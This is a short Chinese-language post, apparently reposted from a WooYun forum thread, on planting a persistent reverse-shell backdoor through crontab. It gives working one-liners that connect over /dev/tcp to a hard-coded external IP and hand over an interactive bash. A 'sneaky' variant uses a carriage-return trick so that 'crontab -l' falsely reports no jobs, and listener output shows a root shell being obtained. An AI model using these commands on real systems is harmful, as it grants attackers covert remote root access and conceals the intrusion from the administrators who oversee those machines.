利用crontab实现无文件兼容性强的反弹后门

最好用一个不常见的用户执行,任务写入/var/spool/cron/$username

(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash --noprofile -i')|crontab -

升级猥琐版

(crontab -l;printf "* * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

crontab -l 直接提示no crontab for $username
[root@vincenthostname bin]# crontab -l
no crontab for root
反弹成功
[vincent@iZ62luqzx5xZ src]$ ./netcat -l -p 2345
bash: no job control in this shell
[root@vincenthostname ~]# whoami
whoami
root

转自:http://zone.wooyun.org/content/18244